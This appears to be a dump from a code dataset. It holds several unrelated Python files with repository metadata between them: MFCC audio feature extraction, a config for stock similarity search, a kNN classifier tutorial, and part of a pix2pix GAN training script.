dtypes[name] = float
aligned_df = self._safe_read_df(
path_aligned,
header_aligned,
sep='\t',
dtypes=dtypes,
na_values='-',
header=0
)
aligned_df.trans_w = aligned_df.trans_w.fillna('-')
aligned_df = aligned_df[aligned_df['id'].isin(word_ids)]
return aligned_df
def get_recognized_transcript(self, path, i):
aligned_df = self.get_recognized_df(path, i)
# from miliseconds to seconds
start_time = aligned_df['start'].min() / 1000
end_time = aligned_df['end'].max() / 1000
mp3_name = self.get_mp3_name(i)
path_transcribed = f'/lnet/express/work/people/stankov/alignment/results/full/scrapping/jan/{mp3_name}/{mp3_name}.tsv'
if not os.path.isfile(path_transcribed):
# print(f'{mp3_name} is not in scraping')
path_transcribed = f'/lnet/express/work/people/stankov/alignment/results/full/time-extracted/jan/{mp3_name}.tsv'
header_transcribed = ['start', 'end', 'recognized', 'true_word', 'cnt', 'dist']
transcribed_df = pd.read_csv(path_transcribed, names=header_transcribed, header=None, sep='\t')
# ic(start_time, end_time, transcribed_df.head())
transcript = transcribed_df[(transcribed_df.start >= start_time) & (transcribed_df.end <= end_time)].recognized.values.tolist()
return ' '.join(transcript)
def resample(self, sr, wav):
if self.resample_transform is None:
self.resample_transform = torchaudio.transforms.Resample(orig_freq=sr, new_freq=self.new_sr)
return self.resample_transform(wav)
def get_wav(self, path):
wav, sr = torchaudio.load(f'{path}.wav', normalize=True)
# stereo to mono if needed
if wav.size(0) == 2:
wav = torch.mean(wav, dim=0).unsqueeze(0)
return self.resample(sr, wav)
def duration_hours(self, filters=None):
if filters is not None:
df = clean_data_parczech(self.df, filters)
else:
df = self.df
return df.duration__segments.sum() / 3600
def plot_stat(self, col_name, filters=None):
if filters is not None:
df = clean_data_parczech(self.df, filters)
else:
df = self.df
# plt.boxplot(dataset.df.avg_char_duration__segments, vert=False)
print(df.sort_values(by=[col_name])[col_name])
plt.plot(range(len(df)), df.sort_values(by=[col_name])[col_name])
plt.title(f'{col_name} sorted, {self.duration_hours(filters):.2f}h')
plt.xlabel('segments')
plt.ylabel(col_name)
plt.show()
def filter_df(self, filters, reset_index=False):
if filters is None:
return
self.df = clean_data_parczech(self.df, filters)
if reset_index:
self.df.reset_index(drop=True, inplace=True)
def get_columns(self):
return self.df.columns.values
def __getitem__(self, i):
path = self.extract_path(i)
return dict(
gold_transcript=self.get_gold_transcript(path),
asr_transcript=self.get_asr_transcript(path),
wav=self.get_wav(path),
path=os.path.dirname(path)
)
def __len__(self):
return len(self.df)
def clean_data(df, params):
# thresholds were selected based on the plot
df = df[(df.type == 'train') | (df.type == 'other')]
df = df[df.recognized_sound_coverage__segments > params['recognized_sound_coverage__segments_lb']]
df = df[df.recognized_sound_coverage__segments < params['recognized_sound_coverage__segments_ub']]
# removed 404.5 hours
# use only long enough segments
ic(df.duration__segments.sum() / 3600)
if 'duration__segments_lb' in params:
df = df[df.duration__segments > params['duration__segments_lb']]
if 'duration__segments_ub' in params:
df = df[df.duration__segments < params['duration__segments_ub']]
ic(df.duration__segments.sum() / 3600)
return df
class CommonVoiceDataset(Dataset):
def __init__(self, base_dir, type, resample_rate=16000):
self.data_path = os.path.join(base_dir, 'clips')
self.df = pd.read_csv(os.path.join(base_dir, f'{type}.tsv'), sep='\t')
self.resample_rate = resample_rate
self.resample_transform = None
def resample(self, waveform, sr):
if self.resample_transform is None:
self.resample_transform = torchaudio.transforms.Resample(sr, self.resample_rate)
return self.resample_transform(waveform)
def __getitem__(self, i):
if torch.is_tensor(i):
i = i.item()
waveform, sample_rate = torchaudio.load(os.path.join(self.data_path, self.df.path[i]))
return dict(
wav=self.resample(waveform, sample_rate),
path=self.df.path[i]
)
def __len__(self):
return len(self.df)
class MFCCExtractorPL(pl.LightningModule):
def __init__(self, n_mffcs, n_mels, f_max, resample_rate, output_dir, n_fft=400):
super(MFCCExtractorPL, self).__init__()
self.output_dir = output_dir
self.n_fft = n_fft
self.sr = resample_rate
self.MFCC_transform = torchaudio.transforms.MFCC(
resample_rate,
n_mfcc=n_mffcs,
melkwargs=dict(
n_mels=n_mels,
n_fft=n_fft, # default
hop_length=n_fft // 2, # default
f_max=f_max,
)
)
self.delta_transform = torchaudio.transforms.ComputeDeltas()
def prepare_data(self):
if os.path.exists(self.output_dir):
shutil.rmtree(self.output_dir)
os.makedirs(self.output_dir)
def forward(self, batch):
wavs, _, lens = batch
mfccs_batch = self.MFCC_transform(wavs)
deltas_batch = self.delta_transform(mfccs_batch)
deltas2_batch = self.delta_transform(deltas_batch)
# all shapes [batch_size, 1, 13, max_n_frames]
# stacking features
output = torch.cat([mfccs_batch, deltas_batch, deltas2_batch], dim=2).squeeze().permute(0, 2, 1)
# [batch_size, max_n_frames, 13 * 3]
n_frames = torch.tensor([compute_frames(l, self.sr) for l in lens], device=self.device)
return output, n_frames
def compute_frames(wave_len, sample_rate):
ms_int = int(wave_len / sample_rate * 1000)
# these "random" operations mimic how hubert.feature extractor counts frames in the audio
new_ms = (ms_int - (ms_int % 5) - 1) // 20
return new_ms
class SaveResultsCB(pl.Callback):
def __init__(self, target_path, n_fft, buffer_size, df_type, total_batches, resample_rate=16000, frame_length=20):
self.df_type = df_type
self.output_dir = target_path
self.n_fft = n_fft
# number of frames to store at one csv
self.buffer_size = buffer_size
self.frame_length = frame_length
self.dataframes = []
self.current_buffer = 0
# count how many df written to disk
self.cnt = 0
self.resample_rate = resample_rate
self.total_duration_sec = 0
self.loggers = {}
self.total_batches = total_batches
def extract_name(self, path):
if self.df_type == 'common_voice':
return path
elif self.df_type == 'parczech':
return '/'.join(path.split('/')[-2:])
else:
raise NotImplementedError(f'{self.df_type} is not supported')
def write_df(self, trainer):
output_path = os.path.join(self.output_dir, f'{trainer.global_rank:02}-{self.cnt:04}.csv')
result = pd.concat(self.dataframes).reset_index()
result['path'] = result['path'] + '/' + result['index'].astype(str)
result.drop('index', axis=1).to_csv(output_path, index=False)
self.current_buffer = 0
self.dataframes = []
self.cnt += 1
def on_predict_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):
_, paths, wave_lens = batch
self.total_duration_sec += sum(w_len / self.resample_rate for w_len in wave_lens)
mfcc_features, frames_cnt = outputs[0].cpu().numpy(), outputs[1].cpu().numpy()
for n_frames, features, path in zip(frames_cnt, mfcc_features, paths):
self.current_buffer += n_frames
# select only useful frames without padding
features = features[:n_frames]
features_df = pd.DataFrame(data=features)
features_df['path'] = self.extract_name(path)
self.dataframes.append(features_df)
if self.current_buffer >= self.buffer_size:
self.write_df(trainer)
if batch_idx % 50 == 0:
logger = self.loggers[pl_module.global_rank]
logger.debug(f'gpu={pl_module.global_rank:2} batches processed {batch_idx:4}/{self.total_batches} ... {batch_idx / self.total_batches:.4f}')
def setup(self, trainer: "pl.Trainer", pl_module: "pl.LightningModule", stage: Optional[str] = None) -> None:
# setup loggers for each gpu
# logging.basicConfig(filename=logging_file, filemode='a', level=logging.DEBUG, format='%(asctime)s - %(message)s', datefmt='%H:%M:%S %d.%m.%Y')
handler = logging.FileHandler(f'gpu-{pl_module.global_rank}.log')
formatter = logging.Formatter(fmt='%(asctime)s - %(message)s', datefmt='%H:%M:%S %d.%m.%Y')
handler.setFormatter(formatter)
logger = logging.getLogger(f'{pl_module.global_rank}')
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
self.loggers[pl_module.global_rank] = logger
def on_predict_epoch_end(self, trainer, pl_module, outputs):
if self.dataframes != []:
self.write_df(trainer)
logger = self.loggers[pl_module.global_rank]
total_duration_hours = int(self.total_duration_sec // 3600)
remaining_seconds = int(self.total_duration_sec % 3600)
total_duration_mins = int(remaining_seconds // 60)
total_duration_secs = int(remaining_seconds % 60)
logger.debug(f'gpu={pl_module.global_rank:2} finished, {total_duration_hours:3}:{total_duration_mins:2}:{total_duration_secs:.3f} or'
f' {self.total_duration_sec:.3f} seconds')
def collate_fn(batch):
M = max([x['wav'].size(-1) for x in batch])
wavs = []
paths = []
for x in batch:
padded = F.pad(x['wav'], (0, M - x['wav'].size(-1)))
wavs.append(padded)
paths.append(x['path'])
# save lengths of waveforms, will be used to cut the padding from spectrogram
lengths = [x['wav'].size(-1) for x in batch]
return torch.stack(wavs, dim=0), paths, lengths
def plot_spectrogram(spec, title=None, ylabel='freq_bin', aspect='auto', xmax=None, lim=None):
fig, axs = plt.subplots(1, 1)
axs.set_title(title or 'Spectrogram (db)')
axs.set_ylabel(ylabel)
axs.set_xlabel('frame')
im = axs.imshow(spec, origin='lower', aspect=aspect)
if xmax:
axs.set_xlim((0, xmax))
fig.colorbar(im, ax=axs)
if lim is not None:
plt.axvline(x=lim, color='red')
plt.show(block=False)
# %%
if __name__ == '__main__':
# %%
# logging.basicConfig(filename=logging_file, filemode='a', level=logging.DEBUG, format='%(asctime)s - %(message)s', datefmt='%H:%M:%S %d.%m.%Y')
params = dict(
resample_rate=16000,
batch_size=70,
n_mffcs=13,
n_mels=40,
n_fft=640,
buffer_size=130000,
df_type='parczech',
frame_length_ms=20,
data_type='validated'
)
parczech_clean_params = dict(
recognized_sound_coverage__segments_lb=0.45,
recognized_sound_coverage__segments_ub=0.93,
duration__segments_lb=0.5,
)
if 'lnet' in os.getcwd():
df_path = '/lnet/express/work/people/stankov/alignment/Thesis/clean_with_path_large.csv'
# df = pd.read_csv(df_path, sep='\t')
# directory where mfccs will be stored
output_dir = '/lnet/express/work/people/stankov/alignment/mfcc'
dataset = ParCzechDataset(df_path, resample_rate=params['resample_rate'], clean_params=parczech_clean_params)
else:
# under base dir there are tsv file and clips/ folder
base_dir = '/root/common_voice_data/cv-corpus-7.0-2021-07-21/cs'
# directory where mfccs will be stored
output_dir = os.path.join(base_dir, 'mffcs')
dataset = CommonVoiceDataset(base_dir, params['data_type'], params['resample_rate'])
# %%
dataloader = DataLoader(dataset, batch_size=params['batch_size'], shuffle=False, collate_fn=collate_fn, num_workers=os.cpu_count() // 4, pin_memory=True)
extractor = MFCCExtractorPL(n_mffcs=params['n_mffcs'], n_mels=params['n_mels'], n_fft=params['n_fft'], f_max=params['resample_rate'] // 2,
output_dir=output_dir, resample_rate=params['resample_rate'])
cb = SaveResultsCB(output_dir, params['n_fft'], buffer_size=params['buffer_size'], df_type=params['df_type'], frame_length=params['frame_length_ms'],
total_batches=len(dataloader))
trainer = pl.Trainer(gpus=-1, strategy='ddp', num_sanity_val_steps=0, callbacks=cb, deterministic=True, progress_bar_refresh_rate=0)
# trainer = pl.Trainer(gpus=1, num_sanity_val_steps=0, callbacks=cb, precision=16, deterministic=True, limit_predict_batches=10)
trainer.predict(extractor, dataloader)
ic('done')
| Stanvla/Thesis | hubert/clustering/torch_mffc_extract.py | torch_mffc_extract.py | py | 17,709 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "icecream.ic",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "os.path.path.joi... |
8694387627 | import pandas as pd
import numpy as np
import os
from datetime import timedelta
import math
pd.set_option('display.width', 1200)
pd.set_option('precision', 3)
np.set_printoptions(precision=3)
np.set_printoptions(threshold=np.nan)
class Config:
__instance = None
def __new__(cls, *args, **kwargs):
if cls.__instance is None:
cls.__instance = object.__new__(cls, *args, **kwargs)
return cls.__instance
def __init__(self):
print('Init Config!', os.getpid())
# 文件路径相关参数
self.rootPath = os.path.split(os.path.abspath(os.path.dirname(__file__)))[0]
self.ZZ800_DATA = self.rootPath + '/data/800_data.csv'
self.ZZ800_RAW_DATA = self.rootPath + '/data/800_raw_data.csv'
self.ZZ800_CODES = self.rootPath + '/data/800_codes.csv'
self.ZZ800_RM_VR_FFT = self.rootPath + '/data/800_rm_vr_fft.csv'
self.MARKET_RATIO = self.rootPath + '/data/index_ratio.csv'
self.TRAINING_DAY = self.rootPath + '/data/trading_day.csv'
# self.speed_method = 'value_ratio_fft_euclidean' # for 沪深300指数预测
self.speed_method = 'rm_market_vr_fft' # for 沪深800选股
self.update_start = '2018-05-18' # 更新数据的开始时间(数据库日期的最后一天的下一天)
self.update_end = '2018-05-21' # 更新数据的结束时间(这一天也会被更新下来)
self.auto_update = False # 回测时是否自动更新数据
self.plot_simi_stock = False # 是否画出相似股票
# self.is_regression_test = False # 是回测还是预测
# self.start_date = pd.to_datetime('2018-05-16') #回测的开始时间。 比如'2018-01-01',则从'2018-01-02'开始做预测
# self.regression_days = 5
self.is_regression_test = True
self.start_date = pd.to_datetime('2011-01-01')
self.regression_days = 800
self.regression_end_date = self.start_date + timedelta(days=self.regression_days) # 回测结束时间
# 相似性查找参数
self.pattern_length = 30
self.nb_similar_make_prediction = 20 # avergae them as a pred
self.nb_similar_of_all_similar = 4000 # 从所有股票的相似票中选择top N
self.nb_similar_of_each_stock = 200
self.slide_window = 1500
self.weighted_dist = True
self.weight_a = 1
self.weight_b = 2
self.alpha = np.multiply([1, 1, 1, 1, 1], 40)
self.beata = np.multiply([1, 1, 1, 1, 1], math.pi / 180)
self.fft_level = 5
self.similarity_method = 'euclidean' # or 'pearsonr'
self.cores = 20
self.nb_codes = 800
# 输出文件地址
name = str(self.start_date.date()) + '_' + str(self.speed_method) + '_' + str(self.nb_similar_make_prediction)
self.PEARSON_CORR_RESLUT = self.rootPath + '/output/corr' + name + '.csv'
self.PRDT_AND_ACT_RESULT = self.rootPath + '/output/pred' + name +'.csv'
self.regression_result = self.rootPath + '/pic/para_' + name + '.png'
config = Config()
if __name__ == '__main__':
std_data = pd.read_csv(config.DATA)
| cheersyouran/simi-search | codes/config.py | config.py | py | 3,162 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "pandas.set_option",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pandas.set_option",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.set_printoptions",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.set_pri... |
20238646277 | from numpy import *
import operator
import matplotlib
import matplotlib.pyplot as plt
from os import listdir
def classify0(inX, dataSet, labels, k):
    """Classify *inX* by majority vote among its k nearest training samples.

    Args:
        inX: feature vector to classify (sequence of length n_features).
        dataSet: (n_samples, n_features) numpy array of training samples.
        labels: per-sample labels, parallel to dataSet rows.
        k: number of neighbours to vote.

    Returns:
        The most frequent label among the k nearest neighbours (ties broken
        by first-counted label, as before).

    Fix: removed the stray debug print of the data-set size.
    """
    dataSetSize = dataSet.shape[0]
    # Euclidean distance from inX to every training sample.
    diffMat = tile(inX, (dataSetSize, 1)) - dataSet
    sqDiffMat = diffMat ** 2
    sqDistances = sqDiffMat.sum(axis=1)
    distances = sqDistances ** 0.5
    sortedDistIndices = distances.argsort()  # indices, nearest first
    classCount = {}
    for i in range(k):
        voteLabel = labels[sortedDistIndices[i]]
        classCount[voteLabel] = classCount.get(voteLabel, 0) + 1
    # Stable sort preserves insertion order among equal counts (same
    # tie-breaking as the original).
    sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)
    return sortedClassCount[0][0]
def createDataSet():
    """Return the tiny demo training set: four 2-D points and their labels."""
    samples = array([
        [1.0, 1.1],
        [1.0, 1.0],
        [0.0, 0.0],
        [0.0, 0.1],
    ])
    sample_labels = ['A', 'A', 'B', 'B']
    return samples, sample_labels
def file2matrix(filename):
    """Parse a tab-separated data file into features and labels.

    Each line must hold at least four tab-separated fields: three numeric
    features followed by an integer class label (last field).

    Returns:
        (features, labels): a (n, 3) numpy array and a list of ints.

    Fixes: the file handle is now closed (context manager); the debug
    print of the line count is removed.
    """
    with open(filename) as handle:
        lines = handle.readlines()
    numberOfLines = len(lines)
    returnMat = zeros((numberOfLines, 3))
    classLabelVector = []
    for index, raw in enumerate(lines):
        listFromLine = raw.strip().split('\t')
        returnMat[index, :] = listFromLine[0:3]
        classLabelVector.append(int(listFromLine[-1]))
    return returnMat, classLabelVector
def show(datingDataMat, datingLabels):
    """Scatter-plot features 1 vs 2, sized/coloured by class label.

    Opens an interactive matplotlib window (plt.show() blocks until closed).
    """
    fig = plt.figure()
    ax = fig.add_subplot(111)
    # Marker size and colour both scale with the integer label (15 * label).
    ax.scatter(datingDataMat[:, 1], datingDataMat[:, 2], 15.0 * array(datingLabels), 15.0 * array(datingLabels))
    plt.show()
def autoNorm(dataSet):
    """Scale each feature column of *dataSet* linearly into [0, 1].

    Returns:
        (normDataSet, ranges, minVals): the normalized array plus the
        per-column ranges and minimums needed to normalize new samples.

    Note: a constant column (range 0) divides by zero, as in the original.
    Fix: removed a dead `zeros(shape(dataSet))` allocation that was
    immediately overwritten.
    """
    minVals = dataSet.min(0)  # column-wise minimum
    maxVals = dataSet.max(0)  # column-wise maximum
    ranges = maxVals - minVals
    m = dataSet.shape[0]
    normDataSet = dataSet - tile(minVals, (m, 1))
    normDataSet = normDataSet / tile(ranges, (m, 1))
    return normDataSet, ranges, minVals
def datingClassTest():
    """Evaluate classify0 on the dating data set and print the error rate.

    Requires 'datingTestSet2.txt' in the working directory. The front
    hoRatio fraction of rows is the test set; the rest is training data.
    """
    # NOTE(review): the comment says "hold out 10%" but the value is 0.50 —
    # half the file is used for testing; confirm which was intended.
    hoRatio = 0.50  # hold out 10%
    datingDataMat, datingLabels = file2matrix('datingTestSet2.txt')  # load data setfrom file
    normMat, ranges, minVals = autoNorm(datingDataMat)
    m = normMat.shape[0]
    numTestVecs = int(m * hoRatio)
    errorCount = 0.0
    for i in range(numTestVecs):
        # Classify each held-out row against the remaining (training) rows.
        classifierResult = classify0(normMat[i, :], normMat[numTestVecs:m, :], datingLabels[numTestVecs:m], 3)
        print("the classifier came back with: %d, the real answer is: %d" % (classifierResult, datingLabels[i]))
        if (classifierResult != datingLabels[i]):
            errorCount += 1.0
    print( "the total error rate is: %f" % (errorCount / float(numTestVecs)))
    # print(errorCount)
def img2vector(filename):
    """Flatten a 32x32 text bitmap of '0'/'1' characters into a (1, 1024) vector.

    Fixes: removed a broken debug statement — `"returnVect\n" + returnVect`
    concatenated str with ndarray and raised TypeError on every call — and
    closed the file via a context manager.
    """
    returnVect = zeros((1, 1024))
    with open(filename) as fr:
        for i in range(32):
            lineStr = fr.readline()
            for j in range(32):
                returnVect[0, 32 * i + j] = int(lineStr[j])
    return returnVect
def handwritingClassTest():
    """Train and evaluate kNN on handwritten-digit bitmaps; print error stats.

    Requires 'trainingDigits/' and 'testDigits/' directories whose files are
    named '<digit>_<sample>.txt' (the digit before the underscore is the label).
    """
    hwLabels = []
    trainingFileList = listdir('trainingDigits')  # load the training set
    m = len(trainingFileList)
    trainingMat = zeros((m, 1024))
    for i in range(m):
        fileNameStr = trainingFileList[i]
        fileStr = fileNameStr.split('.')[0]  # take off .txt
        classNumStr = int(fileStr.split('_')[0])  # label encoded in the filename
        hwLabels.append(classNumStr)
        trainingMat[i, :] = img2vector('trainingDigits/%s' % fileNameStr)
    testFileList = listdir('testDigits')  # iterate through the test set
    errorCount = 0.0
    mTest = len(testFileList)
    for i in range(mTest):
        fileNameStr = testFileList[i]
        fileStr = fileNameStr.split('.')[0]  # take off .txt
        classNumStr = int(fileStr.split('_')[0])
        vectorUnderTest = img2vector('testDigits/%s' % fileNameStr)
        classifierResult = classify0(vectorUnderTest, trainingMat, hwLabels, 3)
        print("the classifier came back with: %d, the real answer is: %d" % (classifierResult, classNumStr))
        if (classifierResult != classNumStr): errorCount += 1.0
    print("\nthe total number of errors is: %d" % errorCount)
    print("\nthe total error rate is: %f" % (errorCount / float(mTest)))
if __name__ == "__main__":
    # Sanity-check the classifier on the toy data set, then run the full
    # handwritten-digit evaluation (needs trainingDigits/ and testDigits/).
    group, labels = createDataSet()
    classer = classify0([0, 0], group, labels, 3)
    handwritingClassTest()
    # datingDataMat, datingLabels=file2matrix('datingTestSet2.txt')
    # show(datingDataMat,datingLabels)
| geroge-gao/MachineLeaning | kNN/kNN.py | kNN.py | py | 4,622 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "operator.itemgetter",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "matplo... |
23861578625 | from collections import defaultdict
def is_isogram(string):
    """Return True if no letter occurs more than once in *string*.

    Comparison is case-insensitive; non-letter characters (hyphens,
    spaces, digits) are ignored.

    Improvement: short-circuits on the first repeated letter instead of
    counting every character first.
    """
    seen = set()
    for ch in string.lower():
        if ch.isalpha():
            if ch in seen:
                return False
            seen.add(ch)
    return True
| stackcats/exercism | python/isogram.py | isogram.py | py | 231 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 4,
"usage_type": "call"
}
] |
17643428428 | import argparse
import os
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm import tqdm
from torchvision.utils import save_image
from torch.utils.data import Dataset, DataLoader
import albumentations
from albumentations.pytorch import ToTensorV2
from PIL import Image
import numpy as np
torch.backends.cudnn.benchmark = True
# Dicriminator model definition
class Discriminator(nn.Module):
def __init__(self, in_channels=3) -> None:
super().__init__()
self.convlayers = nn.Sequential(
nn.Conv2d(in_channels=in_channels*2, out_channels=64,
kernel_size=4, stride=2, padding=1, padding_mode="reflect",),
nn.LeakyReLU(0.2),
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4,
stride=2, bias=False, padding_mode="reflect",),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2),
nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4,
stride=2, bias=False, padding_mode="reflect",),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2),
nn.Conv2d(in_channels=256, out_channels=512, kernel_size=4,
stride=1, bias=False, padding_mode="reflect",),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2),
nn.Conv2d(in_channels=512, out_channels=1, kernel_size=4,
stride=1, padding=1, padding_mode="reflect",),
nn.LeakyReLU(0.2),
)
def forward(self, x, y) -> None:
out = torch.cat([x, y], dim=1)
out = self.convlayers(out)
return out
# generator class definition
class Generator(nn.Module):
    """U-Net generator for pix2pix: 8 downsampling steps mirrored by 8
    upsampling steps, with skip connections concatenated at each level."""

    # U-NET encoder section
    def encoder(self, in_channels, out_channel, is_relu=False, need_batch_norm=True):
        """One downsampling step: stride-2 conv + batchnorm + (Leaky)ReLU."""
        # NOTE(review): need_batch_norm=False would put a literal None inside
        # nn.Sequential, which raises at construction; that path is never
        # taken by the current code but should be fixed before use.
        x = nn.Sequential(
            nn.Conv2d(in_channels, out_channel, 4, 2, 1,
                      bias=False, padding_mode="reflect"),
            nn.BatchNorm2d(out_channel) if need_batch_norm else None,
            nn.ReLU() if is_relu else nn.LeakyReLU(),
        )
        return x

    # # U-NET decoder section
    def decoder(self, in_channels, out_channel, is_relu=False, need_batch_norm=True, need_dropout=True, ):
        """One upsampling step: transposed conv + batchnorm + activation,
        with optional dropout (used on the deepest three decoder levels)."""
        return nn.Sequential(
            nn.ConvTranspose2d(in_channels, out_channel, 4, 2, 1, bias=False),
            nn.BatchNorm2d(out_channel),
            nn.ReLU() if is_relu else nn.LeakyReLU(),
        ) if not need_dropout else nn.Sequential(
            nn.ConvTranspose2d(in_channels, out_channel, 4, 2, 1, bias=False),
            nn.BatchNorm2d(out_channel),
            nn.ReLU() if is_relu else nn.LeakyReLU(),
            nn.Dropout(0.5),
        )

    def __init__(self, in_channels=3, features=64):
        super().__init__()
        # Initial down layer: no batchnorm on the first convolution.
        self.layer1 = nn.Sequential(
            nn.Conv2d(in_channels, features, kernel_size=4,
                      stride=2, padding=1, padding_mode="reflect"),
            nn.LeakyReLU(0.2),
        )
        self.layer2 = self.encoder(
            in_channels=features, out_channel=features * 2)
        self.layer3 = self.encoder(features * 2, features * 4)
        self.layer4 = self.encoder(features * 4, features * 8)
        self.layer5 = self.encoder(features * 8, features * 8)
        self.layer6 = self.encoder(features * 8, features * 8)
        self.layer7 = self.encoder(features * 8, features * 8)
        # self.latent = self.encoder(
        #     features * 8, features * 8, need_batch_norm=False)
        # Bottleneck: plain conv + ReLU, no batchnorm (1x1 spatial output).
        self.latent = nn.Sequential(
            nn.Conv2d(features * 8, features * 8, kernel_size=4,
                      stride=2, padding=1),
            nn.ReLU(),
        )
        # Decoder levels; in_channels double from layer9 on because the
        # matching encoder output is concatenated (skip connection).
        self.layer8 = self.decoder(features * 8, features * 8, is_relu=True)
        self.layer9 = self.decoder(
            features * 8 * 2, features * 8, is_relu=True)
        self.layer10 = self.decoder(
            features * 8 * 2, features * 8, is_relu=True)
        self.layer11 = self.decoder(
            features * 8 * 2, features * 8, is_relu=True, need_dropout=False)
        self.layer12 = self.decoder(
            features * 8 * 2, features * 4, is_relu=True, need_dropout=False)
        self.layer13 = self.decoder(
            features * 4 * 2, features * 2, is_relu=True, need_dropout=False)
        self.layer14 = self.decoder(
            features * 2 * 2, features, is_relu=True, need_dropout=False)
        # Final layer maps back to image channels; Tanh keeps output in [-1, 1]
        # to match the Normalize(mean=0.5, std=0.5) input range.
        self.layer15 = nn.Sequential(
            nn.ConvTranspose2d(features*2, in_channels, 4, 2, 1, bias=False),
            nn.Tanh(),
        )

    def forward(self, x):
        """Encode to the bottleneck, then decode with U-Net skip connections."""
        layer1 = self.layer1(x)
        layer2 = self.layer2(layer1)
        layer3 = self.layer3(layer2)
        layer4 = self.layer4(layer3)
        layer5 = self.layer5(layer4)
        layer6 = self.layer6(layer5)
        layer7 = self.layer7(layer6)
        latent = self.latent(layer7)
        layer8 = self.layer8(latent)
        # Each decoder level consumes the previous output concatenated with
        # the encoder activation of matching resolution.
        layer9 = self.layer9(torch.cat([layer8, layer7], 1))
        layer10 = self.layer10(torch.cat([layer9, layer6], 1))
        layer11 = self.layer11(torch.cat([layer10, layer5], 1))
        layer12 = self.layer12(torch.cat([layer11, layer4], 1))
        layer13 = self.layer13(torch.cat([layer12, layer3], 1))
        layer14 = self.layer14(torch.cat([layer13, layer2], 1))
        return self.layer15(torch.cat([layer14, layer1], 1))
# global class for constants and hyperparameters
class config:
    """Namespace of training constants; several fields are overwritten at
    runtime from command-line arguments in main()."""
    DEVICE = "cuda:0" if torch.cuda.is_available() else "cpu"
    TRAIN_DIR = "data/daynight/train"   # default training-pair directory
    VAL_DIR = "data/daynight/val"       # default validation-pair directory
    LEARNING_RATE = 0.0002
    BATCH_SIZE = 16
    NUM_WORKERS = 2                     # DataLoader worker processes
    LAMBDA = 100                        # weight of L1 / regularization terms
    NUM_EPOCHS = 50
    LOAD_MODEL = False                  # overwritten by --loadmodel
    SAVE_MODEL = True
    FLIP_TRAIN = False                  # overwritten by --flip (swap image halves)
    CHECKPOINT_DISC = "disc.pth.tar"    # checkpoint filename suffixes
    CHECKPOINT_GEN = "gen.pth.tar"
    MODEL_DEFAULT = 'maps'              # dataset/model name choices
    MODEL_ANIME = 'anime'
    MODEL_DAYNIGHT = 'daynight'
    MODE = 'train'                      # overwritten by --mode
class DataTransformation:
    """Albumentations pipelines shared by the dataset class.

    `resize` is applied to the (input, target) pair together; `transform`
    augments+normalizes the input; `tranform_mask` only normalizes the
    target. All normalizations map pixels to [-1, 1] (mean/std 0.5).
    """
    # Resize both images identically; image0 aliases the target image.
    resize = albumentations.Compose(
        [albumentations.Resize(width=256, height=256), ], additional_targets={"image0": "image"},
    )
    # NOTE(review): flips/jitter are applied to the input only, so an input
    # may be horizontally flipped while its target is not — confirm intended.
    transform = albumentations.Compose(
        [
            albumentations.HorizontalFlip(p=0.5),
            albumentations.ColorJitter(p=0.2),
            albumentations.Normalize(mean=[0.5, 0.5, 0.5], std=[
                                     0.5, 0.5, 0.5], max_pixel_value=255.0,),
            ToTensorV2(),
        ]
    )
    tranform_mask = albumentations.Compose(
        [
            albumentations.Normalize(mean=[0.5, 0.5, 0.5], std=[
                                     0.5, 0.5, 0.5], max_pixel_value=255.0,),
            ToTensorV2(),
        ]
    )
def save_checkpoint(model, optimizer, filename="my_checkpoint.pth.tar"):
    """Persist the model and optimizer state dicts to *filename*."""
    print("=> Saving checkpoint")
    checkpoint = {
        "state_dict": model.state_dict(),
        "optimizer": optimizer.state_dict(),
    }
    torch.save(checkpoint, filename)
def load_checkpoint(checkpoint_file, model, optimizer, lr):
    """Restore model/optimizer state from *checkpoint_file* and reset the LR."""
    print("=> Loading checkpoint")
    ckpt = torch.load(checkpoint_file, map_location=config.DEVICE)
    model.load_state_dict(ckpt["state_dict"])
    optimizer.load_state_dict(ckpt["optimizer"])
    # The restored optimizer state carries the old learning rate; override it
    # explicitly with the caller-supplied value.
    for group in optimizer.param_groups:
        group["lr"] = lr
'''
This class extends the pytorch Dataset class
'''
class SplitData(Dataset):
    """Dataset of side-by-side image pairs stored as single files.

    Each file in *root_dir* contains the input and target images
    concatenated horizontally; __getitem__ splits them at the midpoint
    and applies the shared DataTransformation pipelines.
    """

    def __init__(self, root_dir) -> None:
        self.root_dir = root_dir
        # Every file in the directory is assumed to be an image pair.
        self.list_files = os.listdir(self.root_dir)

    def __len__(self) -> None:
        return len(self.list_files)

    def __getitem__(self, index) -> None:
        """Return (input_tensor, target_tensor) for the pair at *index*."""
        img_file = self.list_files[index]
        img_path = os.path.join(self.root_dir, img_file)
        image = np.array(Image.open(img_path))
        # get the image shape — midpoint of the concatenated width.
        image_dim = int(image.shape[1]/2)
        # print('image shape: ', image_dim)
        # FLIP_TRAIN swaps which half is input vs target.
        flip = config.FLIP_TRAIN
        # print('flip: ', flip)
        if flip:
            target_image = image[:, :image_dim, :]
            input_image = image[:, image_dim:, :]
        else:
            input_image = image[:, :image_dim, :]
            target_image = image[:, image_dim:, :]
        # Resize both halves together, then augment/normalize separately.
        augmentations = DataTransformation.resize(
            image=input_image, image0=target_image)
        input_image = augmentations["image"]
